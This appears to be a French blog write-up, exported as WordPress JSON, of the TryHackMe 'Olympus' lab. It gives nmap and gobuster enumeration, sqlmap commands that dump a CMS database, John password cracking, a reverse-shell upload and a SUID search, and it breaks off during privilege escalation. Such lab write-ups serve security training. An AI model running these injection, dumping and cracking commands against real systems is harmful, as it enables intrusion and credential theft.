{"id":2412,"date":"2022-07-21T19:12:24","date_gmt":"2022-07-21T17:12:24","guid":{"rendered":"https:\/\/mikadmin.fr\/blog\/?p=2412"},"modified":"2022-07-23T16:50:51","modified_gmt":"2022-07-23T14:50:51","slug":"tryhackme-olympus","status":"publish","type":"post","link":"https:\/\/mikadmin.fr\/blog\/tryhackme-olympus\/","title":{"rendered":"[TryHackme] \u2013 Olympus"},"content":{"rendered":"<span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\"><\/span> <span class=\"rt-time\"> 6<\/span> <span class=\"rt-label rt-postfix\">min read<\/span><\/span><p>Views: 1205<\/p>\n<div style=\"height:38px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/7d73d09352d33d65e0d972c3a17bd6af-1024x802.jpeg\" alt=\"TryHackMe Olympus\" class=\"wp-image-2416\" width=\"344\" height=\"269\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/7d73d09352d33d65e0d972c3a17bd6af-1024x802.jpeg 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/7d73d09352d33d65e0d972c3a17bd6af-300x235.jpeg 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/7d73d09352d33d65e0d972c3a17bd6af-150x118.jpeg 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/7d73d09352d33d65e0d972c3a17bd6af-768x602.jpeg 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/7d73d09352d33d65e0d972c3a17bd6af.jpeg 1200w\" sizes=\"auto, (max-width: 344px) 100vw, 344px\" \/><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong>Lien :<\/strong> <a href=\"https:\/\/tryhackme.com\/room\/olympusroom\" target=\"_blank\" rel=\"noopener\">https:\/\/tryhackme.com\/room\/olympusroom<\/a><\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong>Auteur :<\/strong> <a href=\"https:\/\/tryhackme.com\/p\/G4vr0ch3\" target=\"_blank\" rel=\"noopener\">https:\/\/tryhackme.com\/p\/G4vr0ch3<\/a><\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\"><strong>Difficult\u00e9 :<\/strong> <span style=\"color:#ff6900\" class=\"tadv-color\">Moyenne<\/span><\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<div class=\"wp-block-columns are-vertically-aligned-top is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\"><\/div>\n<\/div>\n\n\n<div class=\"wp-block-aioseo-table-of-contents\"><ul><li><a class=\"aioseo-toc-item\" href=\"#aioseo-\">[Enumeration]<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#aioseo-cms-exploit\">[CMS Exploit]<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#aioseo-user\">[User]<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#aioseo-privesc\">[PrivESC]<\/a><\/li><li><a class=\"aioseo-toc-item\" href=\"#aioseo-bonus\">[BONUS]<\/a><\/li><\/ul><\/div>\n\n\n<p><\/p>\n\n\n\n<h2 class=\"has-text-align-center has-x-large-font-size wp-block-heading\" id=\"aioseo-\">[Enumeration]<\/h2>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-black-color has-text-color has-medium-font-size\">L&rsquo;\u00e9num\u00e9ration de la machine \u00e0 l&rsquo;aide de <span style=\"color:#ff6900\" class=\"tadv-color\"><strong>nmap<\/strong> <\/span>nous permet de d\u00e9couvrir 2 ports ouverts qui sont le <strong>22<\/strong> et le <strong>80<\/strong>.<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\"># nmap -A -T4 -p- 10.10.5.206\n\nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2022-07-21 14:08 GMT\nNmap scan report for 10.10.5.206\nHost is up (0.066s latency).\nNot shown: 65533 closed ports\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   3072 0a:78:14:04:2c:df:25:fb:4e:a2:14:34:80:0b:85:39 (RSA)\n|   256 8d:56:01:ca:55:de:e1:7c:64:04:ce:e6:f1:a5:c7:ac (ECDSA)\n|_  256 1f:c1:be:3f:9c:e7:8e:24:33:34:a6:44:af:68:4c:3c (ED25519)\n80\/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))\n|_http-server-header: Apache\/2.4.41 (Ubuntu)\n|_http-title: Did not follow redirect to http:\/\/olympus.thm<\/code><\/pre>\n\n\n\n<div style=\"height:18px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ce qui nous permet donc de voir sur le scan que nous sommes redirig\u00e9 vers <strong><span style=\"color:#0693e3\" class=\"tadv-color\">http:\/\/olympus.thm<\/span><\/strong>, nous allons donc ajouter ce dernier dans notre fichier <strong>\/etc\/hosts<\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">echo &#039;10.10.5.206 olympus.thm&#039; | sudo tee -a \/etc\/hosts<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">En regardant le site de plus pr\u00e8s nous obtenons cette page :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"536\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-1-1024x536.png\" alt=\"TryHackMe\" class=\"wp-image-2421\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-1-1024x536.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-1-300x157.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-1-150x78.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-1-768x402.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-1.png 1036w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous pouvons donc tenter d&rsquo;\u00e9num\u00e9rer ce site afin d&rsquo;y d\u00e9couvrir des choses int\u00e9ressantes \u00e0 l&rsquo;aide de <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">gobuster<\/span><\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\"># gobuster dir -u http:\/\/olympus.thm\/ -t 30 -w \/usr\/share\/Seclists\/Discovery\/Web-Content\/common.txt\n\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/olympus.thm\/\n[+] Method:                  GET\n[+] Threads:                 30\n[+] Wordlist:                \/usr\/share\/Seclists\/Discovery\/Web-Content\/common.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Timeout:                 10s\n===============================================================\n2022\/07\/21 14:35:16 Starting gobuster in directory enumeration mode\n===============================================================\n\/.hta                 (Status: 403) [Size: 276]\n\/.htaccess            (Status: 403) [Size: 276]\n\/.htpasswd            (Status: 403) [Size: 276]\n\/index.php            (Status: 200) [Size: 1948]\n\/javascript           (Status: 301) [Size: 315] [--&gt; http:\/\/olympus.thm\/javascript\/]\n\/phpmyadmin           (Status: 403) [Size: 276]                                     \n\/server-status        (Status: 403) [Size: 276]                                     \n\/static               (Status: 301) [Size: 311] [--&gt; http:\/\/olympus.thm\/static\/]    \n\/~webmaster           (Status: 301) [Size: 315] [--&gt; http:\/\/olympus.thm\/~webmaster\/]<\/code><\/pre>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On peut donc voir que le dossier \u00ab\u00a0<strong><span style=\"color:#00d084\" class=\"tadv-color\">~webmaster<\/span><\/strong>\u00a0\u00bb n&rsquo;est pas commun et apr\u00e8s v\u00e9rification on obtient le CMS <strong>Victor CMS<\/strong> d&rsquo;install\u00e9 :<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"377\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-2-1024x377.png\" alt=\"\" class=\"wp-image-2424\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-2-1024x377.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-2-300x111.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-2-150x55.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-2-768x283.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-2.png 1083w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"has-text-align-center has-x-large-font-size wp-block-heading\" id=\"aioseo-cms-exploit\">[CMS Exploit]<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous trouvons donc une piste \u00e0 l&rsquo;aide de <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\"><a href=\"https:\/\/www.exploit-db.com\/searchsploit\" target=\"_blank\" rel=\"noopener\">searchsploit<\/a><\/span><\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">searchsploit Victor CMS<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"834\" height=\"240\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-3.png\" alt=\"TryHackMe\" class=\"wp-image-2425\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-3.png 834w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-3-300x86.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-3-150x43.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-3-768x221.png 768w\" sizes=\"auto, (max-width: 834px) 100vw, 834px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:24px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s avoir r\u00e9cup\u00e9r\u00e9 l&rsquo;exploit \u00e0 l&rsquo;aide de <strong>searchsploit<\/strong> :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"541\" height=\"145\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-4.png\" alt=\"\" class=\"wp-image-2426\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-4.png 541w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-4-300x80.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-4-150x40.png 150w\" sizes=\"auto, (max-width: 541px) 100vw, 541px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">L&rsquo;exploit nous explique que le param\u00e8tre \u00ab\u00a0<strong>search<\/strong>\u00a0\u00bb est vuln\u00e9rable \u00e0 une <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">injection SQL<\/span><\/strong> et pour l&rsquo;exploiter nous utilisons <strong>sqlmap<\/strong> :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">sqlmap -u &quot;http:\/\/olympus.thm\/~webmaster\/search.php&quot; --dbs --forms<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"679\" height=\"220\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-5.png\" alt=\"TryHackMe Olympus\" class=\"wp-image-2427\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-5.png 679w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-5-300x97.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-5-150x49.png 150w\" sizes=\"auto, (max-width: 679px) 100vw, 679px\" \/><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">sqlmap -u &quot;http:\/\/olympus.thm\/~webmaster\/search.php&quot; --dbs --forms --tables -D olympus --dump<\/code><\/pre>\n\n\n\n<div style=\"height:25px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On obtiens donc <strong>\u00e9norm\u00e9ment d&rsquo;informations<\/strong> int\u00e9ressantes et \u00e0 noter de c\u00f4t\u00e9 !<\/p>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Voici le premier flag de la machine :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"298\" height=\"151\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-6.png\" alt=\"\" class=\"wp-image-2430\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-6.png 298w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-6-150x76.png 150w\" sizes=\"auto, (max-width: 298px) 100vw, 298px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Et voici le hash de chaque utilisateur du <strong>CMS<\/strong> et que nous devons garder pour la suite :<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-7-1024x133.png\" alt=\"\" class=\"wp-image-2431\" width=\"1225\" height=\"159\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-7-1024x133.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-7-300x39.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-7-150x20.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-7-768x100.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-7.png 1200w\" sizes=\"auto, (max-width: 1225px) 100vw, 1225px\" \/><\/figure>\n\n\n\n<div style=\"height:27px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ainsi qu&rsquo;une table \u00ab\u00a0<strong><span style=\"color:#0693e3\" class=\"tadv-color\">chats<\/span><\/strong>\u00a0\u00bb tr\u00e8s int\u00e9ressante qui nous dit :<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<blockquote class=\"wp-block-quote has-text-align-center is-layout-flow wp-block-quote-is-layout-flow\"><p>This looks great! I tested an upload and found the upload folder, but it seems the filename got changed somehow because I can&rsquo;t download it back I know this is pretty cool. The IT guy used a random file name function to make it harder for attackers to access the uploaded files. He&rsquo;s still working on it.<\/p><\/blockquote>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-8-1024x236.png\" alt=\"\" class=\"wp-image-2435\" width=\"931\" height=\"214\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-8-1024x236.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-8-300x69.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-8-150x35.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-8-768x177.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-8.png 1200w\" sizes=\"auto, (max-width: 931px) 100vw, 931px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:7px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On trouve plus haut dans la table \u00ab\u00a0<strong><span style=\"color:#00d084\" class=\"tadv-color\">users<\/span><\/strong>\u00a0\u00bb un <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">root@chat.olympus.thm<\/span><\/strong> qui nous am\u00e8ne donc \u00e0 ajouter <strong><span style=\"color:#9b51e0\" class=\"tadv-color\">chat.olympus.thm<\/span><\/strong> dans notre fichier <strong>\/etc\/hosts<\/strong> et \u00e0 l&rsquo;analyser de plus pr\u00e8s :<\/p>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-9-1024x505.png\" alt=\"\" class=\"wp-image-2439\" width=\"737\" height=\"363\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-9-1024x505.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-9-300x148.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-9-150x74.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-9-768x379.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-9.png 1065w\" sizes=\"auto, (max-width: 737px) 100vw, 737px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Nous tenterons donc d&rsquo;utiliser les informations trouv\u00e9es dans la base de donn\u00e9es et pour ce faire nous allons utiliser <strong><span style=\"color:#ff6900\" class=\"tadv-color\">John<\/span><\/strong> afin de cracker les passwords :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">john hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n\n\n\n<div style=\"height:29px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On trouve le mot de passe de l&rsquo;utilisateur <strong><span style=\"color:#fcb900\" class=\"tadv-color\">Prometheus<\/span><\/strong> et qui nous permet donc de se connecter \u00e0 notre page de login :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"499\" height=\"215\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-10.png\" alt=\"\" class=\"wp-image-2442\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-10.png 499w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-10-300x129.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-10-150x65.png 150w\" sizes=\"auto, (max-width: 499px) 100vw, 499px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Qui nous am\u00e8ne sur une page permettant d&rsquo;upload un fichier et qui est li\u00e9e aux informations pr\u00e9sentes dans la table \u00ab\u00a0<strong><span style=\"color:#0693e3\" class=\"tadv-color\">chats<\/span><\/strong>\u00a0\u00bb de la DB :<\/p>\n\n\n\n<div style=\"height:10px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"696\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-11-1024x696.png\" alt=\"\" class=\"wp-image-2445\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-11-1024x696.png 1024w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-11-300x204.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-11-150x102.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-11-768x522.png 768w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-11.png 1140w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ce qui nous permet d&rsquo;upload un <strong><a href=\"https:\/\/www.revshells.com\/\" target=\"_blank\" rel=\"noopener\">reverse shell<\/a><\/strong> mais malheureusement le nom du fichier est g\u00e9n\u00e9r\u00e9 al\u00e9atoirement mais pas de soucis pour bypass ceci, il suffit de dump la DB \u00e0 l&rsquo;aide de <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">SQLmap<\/span><\/strong> une nouvelle fois et de lire le nouveau nom de notre fichier :<\/p>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-12.png\" alt=\"\" class=\"wp-image-2446\" width=\"265\" height=\"123\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-12.png 216w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-12-150x69.png 150w\" sizes=\"auto, (max-width: 265px) 100vw, 265px\" \/><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"\" data-line=\"\">sqlmap -u &quot;http:\/\/olympus.thm\/~webmaster\/search.php&quot; --dbs --forms --tables -D olympus --dump --fresh-queries<\/code><\/pre>\n\n\n\n<div style=\"height:26px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Et on trouve donc le nouveau nom de notre fichier qui nous permet d&rsquo;obtenir un premier acc\u00e8s \u00e0 la machine :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"544\" height=\"301\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-13.png\" alt=\"\" class=\"wp-image-2447\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-13.png 544w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-13-300x166.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-13-150x83.png 150w\" sizes=\"auto, (max-width: 544px) 100vw, 544px\" \/><\/figure>\n<\/div>\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-elixir\" data-line=\"\"># http:\/\/chat.olympus.thm\/uploads\/156785861a33c70b6c4c04f591531ca8.php<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"188\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-14.png\" alt=\"\" class=\"wp-image-2448\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-14.png 871w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-14-300x65.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-14-150x32.png 150w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-14-768x166.png 768w\" sizes=\"auto, (max-width: 871px) 100vw, 871px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"has-text-align-center has-x-large-font-size wp-block-heading\" id=\"aioseo-user\">[User]<\/h2>\n\n\n\n<div style=\"height:32px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">On r\u00e9cup\u00e8re donc le second flag de la machine ainsi qu&rsquo;un message laiss\u00e9 de la part de <strong><span style=\"color:#00d084\" class=\"tadv-color\">Prometheus<\/span><\/strong> :<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"599\" height=\"334\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-15.png\" alt=\"\" class=\"wp-image-2452\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-15.png 599w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-15-300x167.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-15-150x84.png 150w\" sizes=\"auto, (max-width: 599px) 100vw, 599px\" \/><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"585\" height=\"216\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-16.png\" alt=\"\" class=\"wp-image-2454\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-16.png 585w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-16-300x111.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-16-150x55.png 150w\" sizes=\"auto, (max-width: 585px) 100vw, 585px\" \/><\/figure>\n<\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Apr\u00e8s avoir list\u00e9 les binaires <strong><span style=\"color:#cf2e2e\" class=\"tadv-color\">SUID<\/span><\/strong>, on trouve donc un binaire peu commun \u00ab\u00a0<strong>cputils<\/strong>\u00a0\u00bb :<\/p>\n\n\n\n<pre class=\"wp-block-prismatic-blocks\"><code class=\"language-bash\" data-line=\"\">find \/ -perm -u=s -type f 2&gt;\/dev\/null<\/code><\/pre>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"585\" height=\"247\" src=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-17.png\" alt=\"\" class=\"wp-image-2461\" srcset=\"https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-17.png 585w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-17-300x127.png 300w, https:\/\/mikadmin.fr\/blog\/wp-content\/uploads\/2022\/07\/image-17-150x63.png 150w\" sizes=\"auto, (max-width: 585px) 100vw, 585px\" \/><\/figure>\n<\/div>\n\n\n<div style=\"height:28px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"has-text-align-center has-medium-font-size\">Ce dernier permet donc de copier le contenu d&rsquo;un fichier appartenant \u00e0 <strong><span style=\"color:#cf2e2e\" 